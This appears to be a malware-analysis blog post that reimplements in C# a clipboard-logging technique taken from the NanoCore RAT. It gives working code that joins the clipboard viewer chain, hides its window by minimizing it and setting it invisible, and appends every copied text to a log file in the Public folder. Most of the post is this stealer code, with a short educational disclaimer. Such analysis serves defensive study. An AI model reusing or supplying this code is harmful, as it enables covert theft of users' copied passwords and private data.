MalwareAnalysisSeries

This repository contains the analysis reports, technical details or any tools created for helping in malware analysis. Additionally, the repo contains extracted TTPs with code along with the detection rules

---

Project maintained by shaddy43 Hosted on GitHub Pages — Theme by mattgraham

NanoCore 1.2.2.0: Clipboard Logging

This is a Clipboard logger TTP extracted from NanoCore 1.2.2.0. In this TTP, the malware sets up a clipboard viewer using SetClipboardViewer Win32 API, to recieve the clipboard data from the windows process of WndProc and saves the stolen clipboard data to a log file created in public folder.

• Execute the logger
• Copy something
• See the log file created in Public folder

Implementation

Required APIs

NanoCore uses exports from user32.dll, SetClipboardViewer to start receiving clipboard data and SendMessage to forward the clipboard data to further devices.

[DllImport("user32.dll")]
private static extern IntPtr SetClipboardViewer(IntPtr hWndNewViewer);

[DllImport("user32.dll")]
private static extern bool ChangeClipboardChain(IntPtr hWndRemove, IntPtr hWndNewNext);

[DllImport("user32.dll")]
private static extern void SendMessage(IntPtr hWnd, int msg, IntPtr wParam, IntPtr lParam);

Establish a log file

The first thing that NanoCore client binary does is to establish a log file in the public folder, where all the stolen data is being recorded until it is exfiltrated.

private static void setup()
{
    clipboard_logger_path = Path.Combine(clipboard_logger_path, Path.ChangeExtension("KB_" + Conversions.ToString(Environment.TickCount), "dat"));
}

Setup clipboard viewer

NanoCore uses hidden form applications to avoid using traditional APIs used for recording keys and clipboard data. For a form application it is easier to register it for RAW inputs in case of keylogging and setting it as a clipboard viewer for clipboard logger. We just need to pass the handle of current form to SetClipboardViewer API. After that, our form will be a part of clipboard viewer chain and can receive & forward all clipboard data.

Since form is visible to the users, so to hide itself NanoCore minimizes and changes the visibility of its form.

public ClipboardViewerForm()
{
    Console.WriteLine("Starting clipboard logger...");
    setup();
    _nextClipboardViewer = SetClipboardViewer(this.Handle);

    Console.WriteLine("Hiding logger");
    this.WindowState = FormWindowState.Minimized; //the form is minimized to hide logger
    this.VisibleChanged += ClipboardViewerForm_VisibleChanged; //visiblity of form is changed to hidden
}

private void ClipboardViewerForm_VisibleChanged(object sender, EventArgs e)
{
    this.Visible = false;
}

Receive Clipboard Data

After the form has been setup as clipboard viewer, it will start receiving clipboard data using the function WndProc. It is a windows procedure function that is responsible for processing messages sent to the Form Window. In our case, our malware is a hidden form application running in background, which will also receive clipboard data using the function WndProc. What we need to do is to simply Handle the clipboard inputs and forward the message to further Forms.

// The process that recieves all clipboard data is over-ridden to include changes in it.
protected override void WndProc(ref Message m)
{
    const int WM_DRAWCLIPBOARD = 0x308;
    const int WM_CHANGECBCHAIN = 0x30D;

    switch (m.Msg)
    {
        case WM_DRAWCLIPBOARD:
            // Clipboard contents have changed
            // Handle clipboard data here
            HandleClipboardChange();
            break;

        case WM_CHANGECBCHAIN:
            if (m.WParam == _nextClipboardViewer)
            {
                // The next clipboard viewer has changed
                _nextClipboardViewer = m.LParam;
            }
            else if (_nextClipboardViewer != IntPtr.Zero)
            {
                // Pass the message to the next viewer in the chain
                SendMessage(_nextClipboardViewer, m.Msg, m.WParam, m.LParam);
            }
            break;

        default:
            base.WndProc(ref m);
            break;
    }
}

From the WndProc, we simply need to handle the received clipboard data. Handle the data and log it in the established log file.

private void HandleClipboardChange()
{
    Console.Write("Getting clipboard data...:");

    try
    {
        if (Clipboard.ContainsText())
        {
            string text = Clipboard.GetText();
            if (text.Length > 128000)
            {
                text = text.Substring(0, 128000); // Use Substring instead of Remove to keep the first 128,000 characters.
            }
            
            Log_clipboard(text);
        }
    }
    catch (Exception ex)
    {
        // Handle any exceptions that may occur while processing clipboard data.
        Console.WriteLine($"Error: {ex.Message}");
        return;
    }
}

private void Log_clipboard(string clipboard_text)
{
    // Implement your processing logic for clipboard data here.
    // This method should handle the clipboard data as needed.
    //MessageBox.Show(clipboard_text);

    File.AppendAllText(Path.Combine(AppDomain.CurrentDomain.BaseDirectory, clipboard_logger_path), $"Copied data at {DateTime.Now}: " + clipboard_text+"\n");
}

This program can only work as Form application because to receive clipboard data using “SetClipboardViewer” and WndProc, we need Windows Forms. There are ways to hide forms, just minimize it and set its visibility to false.

Find Complete Code Click Here: Shaddy43/MalwareAnalaysisSeries

Disclaimer

Artifacts and code of this repository is intended to be used for educational purposes only!!!